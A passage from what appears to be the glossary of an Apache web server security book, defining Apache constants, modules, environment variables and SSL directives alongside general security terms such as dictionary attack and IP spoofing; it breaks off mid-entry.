data integrity Data integrity refers to the state of files. If files are unchanged and no one has tampered with them, they have integrity. If someone has tampered with them, their integrity is breached or degraded.

DEFAULT_ADMIN An Apache Web server constant available at compile-time that lets you specify where httpd’s admin will go. (The default is set in http.h.) See Appendix D, “Apache API Quick Reference.”

DEFAULT_CONTENT_TYPE Web server constant in httpd.h—but also available at compile-time—that lets you specify what Apache’s default content type will be. See Appendix D, “Apache API Quick Reference.”

DEFAULT_HTTP_PORT Web server constant that defines the default port on which Apache will listen for requests (the default is port 80). See Appendix D, “Apache API Quick Reference.”

DEFAULT_HTTPS_PORT Web server constant that defines the default port on which Apache will listen to SSL/HTTPS requests (the default is port 443). See Appendix D, “Apache API Quick Reference.”

DEFAULT_INDEX An Apache Web server constant available at compile-time that lets you set the default index (or a series of default documents, listed in priority) that Apache returns when users call the DocumentRoot directory without a file specification (the default is index.html). See Appendix D, “Apache API Quick Reference.”

DEFAULT_KEEPALIVE An Apache Web server constant available at compile-time that lets you specify the keep-alive interval. See Appendix D, “Apache API Quick Reference.”

DEFAULT_KEEPALIVE_TIMEOUT An Apache Web server constant available at compile-time that lets you specify the time before which Apache will kill a keep-alive session. See Appendix D, “Apache API Quick Reference.”

DECLINE_CMD An Apache Web server constant in http.h that handles how modules decline a command and whether they pass that request on so that other modules can have a crack at it. See Appendix D, “Apache API Quick Reference.”

DECLINED An Apache Web server constant in http.h that handles how modules decline a request and whether they pass that request on so that other modules can have a crack at it. See Appendix D, “Apache API Quick Reference.”

DEFAULT_PATH An Apache Web server constant available at compile-time that lets you specify where httpd will house itself. See Appendix D, “Apache API Quick Reference.”

DEFAULT_TIMEOUT An Apache Web server constant available at compile-time that lets you specify Apache’s main timeout interval. See Appendix D, “Apache API Quick Reference.”

denial-of-service attack A condition wherein your server becomes inoperable after an attack. When an attacker undertakes a denial-of-service attack, he seeks to disable your server and thereby deny service to legitimate users.

dictionary attack Dictionary or wordlist attacks work like this: Crackers obtain your encrypted passwords and, using the same password algorithm as your system, encrypt many thousands of words. They generally derive the words from dictionaries, hence the name. Their software then compares each newly encrypted word to your encrypted passwords. When a match occurs, that password is deemed cracked.

digest access authentication A security extension for HTTP that provides only basic, nonencrypted user authentication over the Web. To learn more, please see RFC 2069.

digital certificate Digital certificates are typically numeric values derived from cryptographic processes, and you or Apache can use these to verify users or hosts.

DOCUMENT_LOCATION An Apache Web server constant available at compile-time that lets you specify DocumentRoot (where the default directory and top-level default index reside). See Appendix D, “Apache API Quick Reference.”

DONE An Apache Web server constant that Apache returns when module phase handlers complete a request (inside request_rec). See Appendix D, “Apache API Quick Reference.”

DoS See denial-of-service attack.

DSS (Digital Signature Standard) The Digital Signature Standard. DSS makes use of the Digital Signature Algorithm, and lets you or Apache identify a message’s sender and authenticity. Find DSS specifications in the National Institute of Standards and Technology’s (NIST) Federal Information Processing Standard (FIPS) 186: http://ww.itl.nist.gov/div897/pubs/fip186.htm.

EDI Electronic Data Interchange. EDI empowers chiefly large enterprises (multinationals, governments, and so on). EDI standards specify data formatting conventions for automated transmissions in everything from procurement to medical billing to defense auditing. EDI messages generally travel in plain text, but each line or data element has a preceding tag that identifies what that element represents (address, name, zip code). Participating enterprises that agree on and adopt a mutual standard can thus send electronic data (typically commercial data) between networks of disparate architecture cleanly, accurately, and seamlessly. For more information on such standards, visit The X12 Consortium (http://www.x12.org) or The Data Interchange Standards Association (http://www.disa.org).

encryption The process of scrambling data so that it’s unreadable by unauthorized parties. In most encryption schemes, you must have a password to reassemble the data into readable form. Encryption enhances privacy and can protect sensitive, confidential, privileged, proprietary, classified, secret, or top secret information.

environment variable Environment variables are values that denote your default shell, home directory, mail directory, path, username, time zone, and so on. Shells use these variables to determine where to send mail, store your files, find commands, and so on. Many environment variables exist, and generally your operating system sets them automatically when you log in. See $SHELL, $HOME, $MAIL, $PATH, $LOGNAME, $TERM, and $TZ.

EPL Evaluated Products List.

execute Execute permissions grant users, groups, or others the right to execute the specified file.

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filtering Loosely defined, the process of checking network packets for integrity 
and security. Filtering is typically an automated process performed by either routers 
or software. In Apache terms, a system whereby you can specify and send files to or 
through a filter or program that handles them in a special way. 


firewall A device (hardware or software) that refuses unauthorized users access to 
a host or examines each packet’s source address or content and performs some predefined 
operation based on what it finds therein. 


gen_test_char.c Apache server source file that contains an encoded table (used in 
conjunction with util.c) to scan for certain characters (&, ;, `, ', \, ", |, *, ?, ~, <, >, 
^, (, ), [, ], {, }, and $). Includes apr.h, apr_lib.h, stdio.h, ap_config.h, and 
httpd.h. 


foreground Where programs run by default, where you can see their output in 
real-time, and where they eat maximum memory resources. Compare this with 
background. 


fork A program flow event when your operating system or application creates a 
new or child process. During a fork, the system or application makes a copy of the 
original or parent process. The child then continues to work independently of the 
parent. 


GOTS Government-Off-The-Shelf. 


granularity Degree to which you can incisively apply access controls. The more 
granularity, the more incisive you can get. 


group A collection of users represented by a value, typically a name, alias, or label. 
Such values let you specify file or network permissions to many individuals at once. 
Users belonging to the same group share similar or identical access privileges. 


hacker Someone interested in operating systems, software, security, and networking. 
Also a programmer. 


history Your command history. In csh, you can review your command history 
with the history command. In response, csh echoes commands you recently used 
and precedes them by sequential numbers. To recall a command, issue a bang (!) 
plus the command history number. Example: If command number 33 was ls -l, 
recall it like this: !33. 


home The directory your operating system drops you into when you log in. In 
Unix, it’s typically /home/hacker, where hacker is your username. In Windows, it 
varies. See $HOME. 


host A computer with a network address. 
host table A record of hostname-network address pairs. Host tables identify the 
name and location of each host on your network. Your operating system consults 
this before it begins a data transmission. Think of a host table as an address book. 


hosts_access A system and language common to tcpd that controls what users 
can access your server. 


hosts_options A system that provides optional extensions for controlling access to 
your server (an extension to hosts_access). 


hosts.equiv The trusted remote hosts and users database on some Unix platforms; 
a file that contains host names and addresses that localhost trusts. 


htpasswd A program for creating and manipulating HTTP-server password files. 


HTTP_ACCEPT Environment variable that stores the MIME types the client will 
accept. 


HTTP_ACCEPTED Web server constant that defines Accepted status (indicating a 
request was accepted but not yet processed). See Appendix D, “Apache API Quick 
Reference.” 


HTTP_BAD_GATEWAY Web server constant that denotes bad gateway status (where 
Apache acts as a proxy/gateway and can’t fulfill a request because another server 
failed somehow). See Appendix D, “Apache API Quick Reference.” 


HTTP_BAD_REQUEST Web server constant that denotes bad request status (where the 
client sends a malformed request, and therefore Apache cannot understand it). See 
Appendix D, “Apache API Quick Reference.” 


HTTP_FORBIDDEN Web server constant denoting that Apache understood the client’s 
request but refuses to satisfy it. See Appendix D, “Apache API Quick Reference.” 


HTTP_GATEWAY_TIME_OUT Web server constant that defines the time after which 
Apache will timeout a gateway request (usually because the gateway server failed to 
respond). See Appendix D, “Apache API Quick Reference.” 


HTTP_GONE Web server constant denoting that the requesting resource is gone and 
left no forwarding address. See Appendix D, “Apache API Quick Reference.” 


HTTP_INTERNAL_SERVER_ERROR Web server constant that denotes that Apache 
couldn’t complete a request for server error. See Appendix D, “Apache API Quick 
Reference.” 


HTTP_LENGTH_REQUIRED Web server constant denoting that the request didn’t come 
with a content length (which Apache won’t tolerate), and therefore Apache fails to 
return it. See Appendix D, “Apache API Quick Reference.” 
HTTP_METHOD_NOT_ALLOWED Web server constant denoting that the method the 
client requested on the processed URL is not allowed. See Appendix D, “Apache API 
Quick Reference.” 


HTTP_MOVED_PERMANENTLY Web server constant denoting that the requested resource 
has moved permanently. See Appendix D, “Apache API Quick Reference.” 


HTTP_MOVED_TEMPORARILY Web server constant denoting that the requested resource 
has moved temporarily. See Appendix D, “Apache API Quick Reference.” 


HTTP_NO_CONTENT Web server constant denoting that Apache retrieved the specified 
resource, but found no data there. See Appendix D, “Apache API Quick Reference.” 


HTTP_NOT_ACCEPTABLE Web server constant denoting that the request isn’t acceptable 
based on the headers. See Appendix D, “Apache API Quick Reference.” 


HTTP_NOT_FOUND Web server constant denoting that Apache couldn’t find the 
requested resource. See Appendix D, “Apache API Quick Reference.” 


HTTP_OK Web server constant denoting that everything is fine; Apache completed 
the operation successfully. See Appendix D, “Apache API Quick Reference.” 


HTTP_PAYMENT_REQUIRED Web server constant denoting that payment is required. 
Not yet implemented, but let your imagination run wild on what developers will 
integrate this into. 


HTTP_PRECONDITION_FAILED Web server constant denoting that one of the request’s 
headers, when tested, returned false. See Appendix D, “Apache API Quick Reference.” 


HTTP_PROXY_AUTHENTICATION_REQUIRED Web server constant that denotes that the 
client must first authenticate itself before Apache will satisfy the current request. See 
Appendix D, “Apache API Quick Reference.” 


HTTP_REFERER Environment variable that stores the referring document’s URL. 


HTTP_REQUEST_ENTITY_TOO_LARGE Web server constant denoting that the request 
entity is larger than Apache can handle. See Appendix D, “Apache API Quick 
Reference.” 


HTTP_REQUEST_TIME_OUT Web server constant that denotes the time that Apache 
will wait for a request from the client. If the client fails to request within that period, 
Apache abandons the wait. See Appendix D, “Apache API Quick Reference.” 


HTTP_REQUEST_URI_TOO_LARGE Web server constant that denotes that the client sent 
a URL/URI that’s larger than what Apache can handle. See Appendix D, “Apache API 
Quick Reference.” 


HTTP_SERVICE_UNAVAILABLE Web server constant denoting that Apache is overloaded 
or unavailable, and therefore unable to process requests at the time. See 
Appendix D, “Apache API Quick Reference.” 
HTTP_UNAUTHORIZED Web server constant denoting that the client needed authorization 
to access the requested resource and failed to obtain that authorization. See 
Appendix D, “Apache API Quick Reference.” 


HTTP_UNSUPPORTED_MEDIA_TYPE Web server constant denoting that Apache cannot 
process the request because the media type is unsupported. See Appendix D, “Apache 
API Quick Reference.” 


HTTP_USE_PROXY Web server constant denoting that the client must route the 
request through the specified proxy. See Appendix D, “Apache API Quick Reference.” 


HTTP_VERSION_NOT_SUPPORTED Web server constant denoting that the client sent a 
request containing an HTTP version that the current Apache version doesn’t support. 
See Appendix D, “Apache API Quick Reference.” 


HTTPD_ROOT An Apache Web server constant available at compile-time that lets you 
set ServerRoot. See Appendix D, “Apache API Quick Reference.” 


httpd Apache Hypertext Transfer Protocol Server (your Web server), an executable 
file that starts and stops your Web server. 


HTTPS The HTTPS variable specifies whether the server is using HTTPS. See Chapter 
15, “Apache/SSL.” 


HTTPS_CIPHER The HTTPS_CIPHER environment variable specifies which cipher is 
being used. See Chapter 15, “Apache/SSL.” 


HTTPS_KEYSIZE The HTTPS_KEYSIZE environment variable specifies the session key 
size. See Chapter 15, “Apache/SSL.” 


HTTPS_SECRETKEYSIZE The HTTPS_SECRETKEYSIZE environment variable specifies 
what secret key size is being used. See Chapter 15, “Apache/SSL.” 


HTTP_USER_AGENT Environment variable that stores the client software 
identification. 


hypertext A language that tells Web clients how to display data. Hypertext is 
different than plain text because it’s interactive. In a hypertext document, you click 
or choose any highlighted text or link and the system retrieves the data associated 
with it. 


Hypertext Transfer Protocol (HTTP) The protocol used to traffic hypertext 
across the Internet, and the underlying protocol of the WWW. 


ifconfig A Unix tool that diagnoses and configures network interfaces. 


inetd.conf Internet servers database, a file that lists what services (FTP, TFTP, and 
so on) your server makes available, and how your server will launch such services 
when other hosts request them. (In more recent times, xinetd.conf, the configuration 
file for xinetd, an enhanced inetd, has superseded inetd.conf.) 
International Data Encryption Algorithm (IDEA) IDEA is a powerful block 
cipher encryption algorithm that operates with a 128-bit key. IDEA encrypts data 
faster than DES and is far more secure. 


Internet Protocol Security Option (IPSEC) IP security option used to protect 
IP datagrams even going as far as to order and classify packets according to U.S. 
government categories: unclassified, classified secret, and top secret. See RFC 1038 
(ftp://ftp.isi.edu/in-notes/rfc1038.txt) and RFC 1108 
(ftp://ftp.isi.edu/in-notes/rfc1108.txt). 


interpreter Generally a command interpreter, a shell, or a program that passes 
your instructions to the operating system and reports the results. Less generally, a 
program that reads in and executes special data. Examples: a PostScript interpreter 
reads PostScript data and displays it in documents; a BASIC interpreter runs BASIC 
code. 


IPC Inter-Process Communication. 


intrusion detection The practice of using automated systems to detect intrusion 
attempts. 


IP spoofing Procedure where an attacker assumes another host’s IP to exploit 
trust relationships between machines. 


ipfwadm A Linux-based firewall and accounting administration tool. 


ISO International Standards Organization. 


Java A Sun Microsystems programming language that is object-oriented, suited to 
graphics, multimedia, and networking, and resembles C++, relying heavily on 
objects, messages, classes, and inheritance. Learn more at 
http://developer.java.sun.com/. 


JavaScript Netscape Communications Corporation programming language that 
runs in and manipulates Web browser environments, including Navigator, MSIE, 
Opera, and others. JavaScript has extended functionality and can under certain 
conditions affect local client systems, even reaching beyond a browser environment 
and to the underlying system itself. It therefore can pose security risks in some cases. 
To cut down on cross-browser compatibility issues, the IETF (Internet Engineering 
Task Force) and related organizations standardized JavaScript and re-designated it as 
ECMAScript. Learn more at the European Computer Manufacturers Association, 
located here: http://www.ecma.ch/. 


job A running process. 


job control Feature that lets you start and stop jobs interactively. See job. 


job number A number assigned to a particular job. See job. 
Kerberos Massachusetts Institute of Technology encryption and authentication 
system that incorporates into network applications, relies on trusted third-party 
servers for authentication, and armors data against electronic eavesdropping. 


Kerberos Network Authentication Service Ticket-based authentication 
scheme that you can integrate into network applications. See RFC 1510. 


key Loosely defined, a unique value derived from an algorithmic process that 
identifies a process, host, or user. In public-key/private-key encryption, users have 
both public and private keys. They distribute their public key so others can encrypt 
messages to it. Such a message can only be decrypted with a user’s private key. Not 
even the author of that message can unravel it. Users, therefore, store their private 
keys securely. 


key pair A key pair consists of two elements—a private key and its corresponding 
public key in an asymmetric cryptographic system. See key. 


Linux A Unix flavor that runs on widely disparate architectures, including X86, 
Alpha, Sparc, and PowerPC processors. Linux is a popular Web server platform and 
ships with Apache Web Server. 


listen.c Apache server source file that handles Apache’s socket functions (includ- 
ing testing for IPv6, using large TCP windows when possible, and so on). Includes 
apr_network_io.h, apr_strings.h, apr_lock.h, apr_want.h, ap_config.h, httpd.h, 
http_config.h, ap_listen.h, http_log.h, mpm.h, and mpm_common.h. 


log.c Apache server source file that contains functions that handle logging. 
Includes apr.h, apr_general.h, apr_strings.h, apr_errno.h, apr_thread_proc.h, 
apr_lib.h, apr_signal.h, apr_want.h, stdarg.h, unistd.h, ap_config.h, httpd.h, 
http_config.h, http_core.h, http_log.h, and http_main.h. 


MD5 MD5 is a message digest algorithm that produces a digital fingerprint of 
specified input. Since such a fingerprint is unique, and it’s mathematically difficult to 
create a duplicate, developers use MD5 to authenticate file and session integrity. 


main.c Apache server source file that contains startup functions and usage output. 
Includes apr.h, apr_strings.h, apr_getopt.h, apr_general.h, apr_lib.h, 
apr_want.h, ap_config.h, httpd.h, http_main.h, http_log.h, http_config.h, 
http_vhost.h, apr_uri.h, util_ebcdic.h, ap_mpm.h, and xmlparse.h. 


metacharacter A symbol common to configuration files, shell scripts, Perl 
scripts, and C source code. Typical metacharacters and metacharacter combinations 
are ., !, @, #, $, %, ^, &, &&, *, >, >>, <, <<, !=, ==, +=, ?, =, |, ||, and ~. Check the 
beginning of this glossary for more on these metacharacters. 


mirroring Mirroring is the practice of duplicating disk volumes for the purpose 
of redundancy. Typically you do this across separate drives, or even across separate 
hosts. 
mod_access An Apache access control module that provides access control based on 
client hostname, IP address, and environment variables. See Appendix A, “Apache 
Security-Related Modules and Directives.” 


mod_actions A dynamic content Apache module that provides support for executing 
CGI scripts based on media type or request method. See Appendix A, “Apache 
Security-Related Modules and Directives.” 


mod_alias A URL-mapping Apache module that maps different parts of the host 
filesystem in the document tree, and handles URL redirection. See Appendix A, 
“Apache Security-Related Modules and Directives.” 


mod_auth An Apache access control module that provides user authentication using 
plain text files. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_auth_anon An Apache access control module that provides anonymous user 
access to authenticated areas. See Appendix A, “Apache Security-Related Modules and 
Directives.” 


mod_auth_db An Apache access control module that provides user authentication 
using Berkeley DB files. See Appendix A, “Apache Security-Related Modules and 
Directives.” 


mod_auth_dbm An Apache access control module that provides user authentication 
using DBM files. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_auth_digest An Apache access control module that provides MD5 
authentication. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_auth_ldap An Apache access control module that provides user authentication 
using LDAP. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_autoindex A directory-handling Apache module that provides automatic 
directory listings. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_cern_meta An HTTP response module that adds support for HTTP header 
metafiles. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_cgi A dynamic content Apache module that provides support for invoking 
CGI scripts. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_cgid A dynamic content Apache module that provides support for invoking 
CGI scripts using an external daemon. See Appendix A, “Apache Security-Related 
Modules and Directives.” 


mod_charset_lite A content-type Apache module that configures character set 
translation. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_dav Apache module that offers Class 1 and 2 WebDAV HTTP extensions. See 
Appendix A, “Apache Security-Related Modules and Directives.” 
mod_dir A directory-handling Apache module that provides basic directory 
handling. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_env An environment-related Apache module that handles the passing of 
environments to CGI scripts. See Appendix A, “Apache Security-Related Modules and 
Directives.” 


mod_example Apache module that demonstrates the Apache API. See Appendix A, 
“Apache Security-Related Modules and Directives.” 


mod_expires An HTTP response module that applies expires headers to resources. 
See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_ext_filter A dynamic content Apache module that provides support for 
filtering content with external programs. See Appendix A, “Apache Security-Related 
Modules and Directives.” 


mod_file_cache Apache module that offers caching files in memory for faster 
serving. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_headers An HTTP response module that can add, delete, or replace arbitrary 
HTTP headers to resources. See Appendix A, “Apache Security-Related Modules and 
Directives.” 


mod_imap The imagemap file handler Apache module. See Appendix A, “Apache 
Security-Related Modules and Directives.” 


mod_include A dynamic content Apache module that provides support for server- 
parsed documents. See Appendix A, “Apache Security-Related Modules and 
Directives.” 


mod_info An internal content handler module for Apache that offers server 
configuration information. See Appendix A, “Apache Security-Related Modules and 
Directives.” 


mod_isapi A dynamic content Apache module that provides Windows ISAPI 
Extension support. See Appendix A, “Apache Security-Related Modules and 
Directives.” 


mod_ldap Apache module that offers an LDAP connection pool and shared memory 
cache. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_log_config A logging-related Apache module that is a user-configurable 
logging replacement for mod_log_common. See Appendix A, “Apache Security-Related 
Modules and Directives.” 


mod_mime A content-type Apache module that determines document types using 
file extensions. See Appendix A, “Apache Security-Related Modules and Directives.” 
mod_mime_magic A content-type Apache module that determines document types 
using magic numbers. This is a second line of defense if mod_mime fails to handle the 
request. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_negotiation A content-type Apache module that handles content negotiation. 
See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_proxy An Apache module dealing with caching proxy abilities. See Appendix 
A, “Apache Security-Related Modules and Directives.” 


mod_rewrite A URL-mapping Apache module that maps URIs to filenames using 
regular expressions. See Appendix A, “Apache Security-Related Modules and 
Directives.” 


mod_setenvif An environment-related Apache module that handles environment 
variables based on client information. See Appendix A, “Apache Security-Related 
Modules and Directives.” 


mod_so Apache module that offers support for loading modules at runtime. See 
Appendix A, “Apache Security-Related Modules and Directives.” 


mod_speling A URL-mapping Apache module that corrects simple spelling errors in 
URLs. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_ssl Apache module that offers Secure Sockets Layer (SSL) and Transport Layer 
Security (TLS) protocol support. See Appendix A, “Apache Security-Related Modules 
and Directives.” 


mod_status An internal content handler module for Apache that offers server status 
display. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_suexec A dynamic content Apache module that provides support for running 
CGI requests as a specified user and group (which will be different than Apache’s 
user and group). See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_unique_id An environment-related Apache module that generates a unique 
request identifier for every request. See Appendix A, “Apache Security-Related 
Modules and Directives.” 


mod_userdir A URL-mapping Apache module that maps user home directories. See 
Appendix A, “Apache Security-Related Modules and Directives.” 


mod_usertrack A logging-related Apache module that offers user tracking with 
cookies. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_vhost_alias A URL-mapping Apache module that provides support for 
dynamic virtual hosting. See Appendix A, “Apache Security-Related Modules and 
Directives.” 
mpm_common.c Apache server source file that contains mpm functions, as well as 
platform-specific packet and communication handling (BeOS, BSD, SysV). Includes 
apr.h, apr_thread_proc.h, apr_signal.h, apr_strings.h, apr_lock.h, httpd.h, 
http_config.h, http_log.h, http_main.h, mpm.h, mpm_common.h, ap_mpm.h, 
ap_listen.h, scoreboard.h, pwd.h, and grp.h. 


mpm_winnt A core Apache module that provides multiprocessing with a single 
control process, and a single server process with multiple threads for Windows NT. 
See Appendix A, “Apache Security-Related Modules and Directives.” 


multipart-alternative MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” Also see RFC 1521 for detailed discussion on this and other MIME- 
related issues: ftp://ftp.isi.edu/in-notes/rfc1521.txt. 


multipart-appledouble MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-byteranges MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-digest MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-encrypted MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-form-data MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-header-set MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-mixed MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-parallel MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-related MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-report MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-signed MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-voice-message MIME multipart type. See Appendix D, “Apache API 
Quick Reference.” 
netstat Command that shows current TCP/IP connections and their addresses. 


NetWare A popular network operating system from Novell, Inc. 


Network Information System (NIS) A Sun Microsystems system that enables 
hosts to transfer data repeatedly after authenticating themselves only once to a given 
network. Once called the Yellow Pages system. 


Network Interface Card (NIC) An Ethernet card. 


one-time password A password generated dynamically during a challenge- 
response exchange. OTP-enabled systems generate such passwords using a predefined 
algorithm but are highly secure, because they’re good for the current session only. 


owner User, host, or process with authorization to read, write, or otherwise access 
a given process, file, directory, user, or host. Generally, you as system administrator 
assign ownership, although your system may sometimes automatically assign it 
during an automated task. 


packets Data sent over networks is fragmented into manageable chunks called 
packets, or frames. The protocol used determines their size. 


path A file or directory’s location. Here is a path to the file passwd in the directory 
/etc: /etc/passwd. See $PATH. 


Perl Practical Extraction and Report Language, a programming language suited to 
network programming, text processing, and CGI. 


PGP Pretty Good Privacy, a public key-private key encryption system that offers 
high-grade encryption and privacy. Learn more about PGP at 
http://web.mit.edu/network/pgp.html. 


PostScript A text, imaging, and printer language. PostScript documents express 
text and image geometry in a language that applications and printers understand. 


process A program or job that is currently running. See job. 


prompt Generally, in CLI-based systems, the $, #, >, or % symbol, which signals 
that your operating system is ready to accept commands. Less generally, a signal 
from your operating system or application that it’s waiting for input. 


protocol.c Apache server source file that contains functions that handle direct 
client-to-server communication, read client request lines, and read headers. Includes 
apr.h, apr_strings.h, apr_buckets.h, apr_lib.h, apr_signal.h, apr_want.h, 
util_filter.h, ap_config.h, httpd.h, http_config.h, http_core.h, 
http_protocol.h, http_main.h, http_request.h, http_vhost.h, http_log.h, 
util_charset.h, util_ebcdic.h, stdarg.h, and unistd.h. 


protocol analyzer Hardware or software that can monitor or intercept network 
traffic. 
ps A Unix command that lists current processes. 


Python An object-oriented scripting language common to Linux distributions, but 
which you might also find elsewhere. You can use Python for CGI development. 


RAID Redundant Array of Inexpensive Disks, a set of connected hard drives that 
together act as one drive. RAID helps with data redundancy, backups, and disaster 
recovery. 


read access When a user, group, or external users have read access only, they can 
read a particular file. 


read-only When a file is read-only, users can read it but not write to it. 


REMOTE_ADDR Environment variable that stores the client’s IP address. 


REMOTE_HOST Environment variable that stores the DNS name of the client. 


REMOTE_IDENT Environment variable that stores the remote user ID. 


REMOTE_USER Environment variable that stores the remote authenticated user’s 
name. 


request.c Apache server source file that contains functions to receive and process 
client requests. Includes apr_strings.h, apr_file_io.h, apr_fnmatch.h, apr_want.h, 
ap_config.h, httpd.h, http_config.h, http_request.h, http_core.h, 
http_protocol.h, http_log.h, http_main.h, util_filter.h, util_charset.h, mod_core.h, and 
stdarg.h. 


REQUEST_METHOD Environment variable that stores the HTTP request method the 
client’s using. 


RFC Requests for Comments (RFCs) are the working notes of the Internet 
development community. Engineers often use RFCs to propose new standards. Learn more at 
http://www.rfceditor.org or at http://www.ietf.org/ (The Internet Engineering 
Task Force). 


root The superuser, or all-powerful administrative account in Unix. 


RSA RSA is the Rivest-Shamir-Adleman public key cryptographic algorithm and 
system. RSA is extremely popular because it can be seamlessly integrated into many 
applications, including mainstream applications like Netscape Communicator and 
Microsoft Internet Explorer. 


scoreboard.c Apache server source file that contains scoreboard functions, 
including those dealing with IPC. Includes apr.h, apr_strings.h, apr_portable.h, 
apr_lib.h, apr_want.h, sys/types.h, ap_config.h, httpd.h, http_log.h, 
http_main.h, http_core.h, http_config.h, ap_mpm.h, mpm.h, scoreboard.h, and 
apr_shmem.h. 
Secure Socket Layer (SSL) A Netscape Communications security protocol that 
enables client/server applications to communicate free of eavesdropping, tampering, 
or message forgery. SSL is now used for secure electronic Web commerce. 


SERVER_BUSY_DNS An Apache Web server constant denoting that Apache is still 
waiting for a DNS lookup to complete. See Appendix D, “Apache API Quick 
Reference.” 


SERVER_BUSY_KEEPALIVE An Apache Web server constant denoting that Apache is 
servicing a persistent connection. See Appendix D, “Apache API Quick Reference.” 


SERVER_BUSY_LOG An Apache Web server constant denoting that Apache is writing 
to a log file. See Appendix D, “Apache API Quick Reference.” 


SERVER_BUSY_READ An Apache Web server constant denoting that Apache is reading 
a client request. See Appendix D, “Apache API Quick Reference.” 


SERVER_BUSY_WRITE An Apache Web server constant denoting that Apache is 
writing to a client. See Appendix D, “Apache API Quick Reference.” 


SERVER_DEAD An Apache Web server constant denoting that the server is now 
down. See Appendix D, “Apache API Quick Reference.” 


SERVER_GRACEFUL An Apache Web server constant denoting that the server is 
performing a “graceful” restart. See Appendix D, “Apache API Quick Reference.” 


SERVER_NAME Environment variable that stores the server’s hostname. 


SERVER_PORT Environment variable that stores the server’s port number. 


SERVER_PROTOCOL Environment variable that stores the protocol and version 
number. 


SERVER_SOFTWARE Environment variable that stores the server software name and 
version (in this case, Apache). 


SET (Secured Electronic Transaction) A standard of secure protocols 
associated with online commerce and credit card transactions. Visa and MasterCard are the 
chief players in development of the SET protocol. Its purpose is ostensibly to make 
electronic commerce more secure. 


shadowing The practice of isolating encrypted password values so that they’re 
beyond an attacker’s reach. The passwords are still usable, but hidden from prying 
eyes. These typically reside in /etc/shadow on Unix. 


showmount A Unix program that displays exported file systems. 


S/Key Bellcore one-time password system that secures connections. In S/Key, 
passwords never travel over the network, and therefore attackers cannot sniff them. See 
RFC 1760 for details: ftp://ftp.isi.edu/in-notes/rfc1760.txt. 
sniffer Hardware or software that captures datagrams on a network. Users can 
deploy sniffers legitimately (to diagnose network problems), or illegitimately (to 
crack network passwords and subvert security and privacy). 


source (source code) Raw uncompiled program code that when compiled (or 
simply run) will constitute an application or program. 


SP3 Network Layer Security Protocol. 


SP4 Transport Layer Security Protocol. 


spoofing Procedure where a user or host impersonates another user or host to 
gain unauthorized access to a trusted or trusting target. 


SQL Structured Query Language (relational database query language). 


ssh Secure Shell, a program that encrypts Telnet-like remote sessions. 


ssh-agent Secure Shell’s authentication agent (Unix). 

ssh-keygen Secure Shell’s authentication key generator (Unix). 

sshd Secure Shell’s server (Unix). 


SSL_CIPHER Environment variable that specifies which cipher is being used. See 
Chapter 15, “Apache/SSL.” 


SSL_CLIENT_<x509> Environment variable that specifies the component of the 
client’s DN (Distinguished Name). See Chapter 15, “Apache/SSL.” 


SSL_CLIENT_CERT Environment variable that specifies the Base64 encoding of the 
client’s certificate. See Chapter 15, “Apache/SSL.” 


SSL_CLIENT_CERT_CHAIN_n Environment variable that specifies the Base64 encoding 
of the client’s certificate’s chain. See Chapter 15, “Apache/SSL.” 


SSL_CLIENT_DN Environment variable that specifies the DN (Distinguished Name) 
in the client’s certificate. See Chapter 15, “Apache/SSL.” 


SSL_CLIENT_I_<x509> Environment variable that specifies a component of the 
client’s issuer’s DN. See Chapter 15, “Apache/SSL.” 


SSL_CLIENT_I_DN Environment variable that specifies the DN of the client’s 
certificate issuer. See Chapter 15, “Apache/SSL.” 


SSL_PROTOCOL_VERSION Environment variable that specifies what SSL version is 
being used. See Chapter 15, “Apache/SSL.” 


SSL_SERVER_<x509> Environment variable that specifies a component of the 
server’s DN. See Chapter 15, “Apache/SSL.” 
SSL_SERVER_DN Environment variable that specifies the DN in the server’s 
certificate. See Chapter 15, “Apache/SSL.” 


SSL_SERVER_I_<x509> Environment variable that specifies a component of the 
server's certificate issuer’s DN. See Chapter 15, “Apache/SSL.” 


SSL_SERVER_I_DN Environment variable that specifies the server’s certificate 
issuer’s DN. See Chapter 15, “Apache/SSL.” 


SSL_SSLEAY_VERSION Environment variable that specifies what SSLeay version is 
being used. See Chapter 15, “Apache/SSL.” 


SSLBanCipher SSLBanCipher is the reverse of SSLRequireCipher. For arguments, it 
takes a comma-delimited list of ciphers that the server will reject. See Chapter 15, 
“Apache/SSL.” 


SSLCACertificateFile Use the SSLCACertificateFile directive to specify a file 
that contains not one but several certificates. See Chapter 15, “Apache/SSL.” 


SSLCACertificatePath Use the SSLCACertificatePath directive to specify from 
what certificate authorities you’ll accept a client’s certificate. See Chapter 15, 
“Apache/SSL.” 


SSLCacheServerPath Use the SSLCacheServerPath directive to specify a path to the 
global cache server. See the server documentation for more information. See Chapter 
15, “Apache/SSL.” 


SSLCacheServerPort Use the SSLCacheServerPort directive to specify a port for the 
